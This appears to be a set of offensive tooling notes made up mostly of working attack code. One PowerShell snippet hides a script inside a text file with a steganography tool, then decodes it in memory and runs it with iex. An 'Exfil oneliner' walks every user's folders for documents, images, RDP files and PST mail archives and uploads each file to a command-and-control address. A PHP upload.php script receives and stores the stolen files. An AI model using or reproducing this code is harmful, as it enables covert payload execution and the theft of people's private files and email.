```
#.\stego.exe -C -f .\test.ps1 -p "test" .\input.txt  out2.txt
Compressed by 24.73%
Message exceeded available space by approximately 31859.26%.
An extra 292 lines were added.

#Decrypt and store onmem + type cast as string: 
$payload = .\stego.exe -C -p "test" .\out2.txt|Out-String

#eval whole payload
iex($payload)

```




```

Exfil oneliner

[void]((@(get-childitem $env:homedrive\users\* -Recurse -ea 0) | ? { $_ -match '.txt|.doc|.docx|.rdp|.xls|.xlsx|.jpg|.png|.pst' } | select FullName) -replace 'Fullname','' -replace '@{=','' -replace '}','' | % { (new-object system.net.webclient).uploadfile("http://CC:PORT/upload.php",$_) })

```

```
#//upload.php

<?php
  if(!empty($_FILES))
  {
    $path = "/var/www/html/";



    $path = $path . md5(mt_rand()*mt_rand()) . basename( $_FILES['file']['name']);

    if(move_uploaded_file($_FILES['file']['tmp_name'], $path)) {
     
    echo 'ok' .PHP_EOL;
    } else{
      
    echo 'not ok'. PHP_EOL;
    }
  }
?>
```
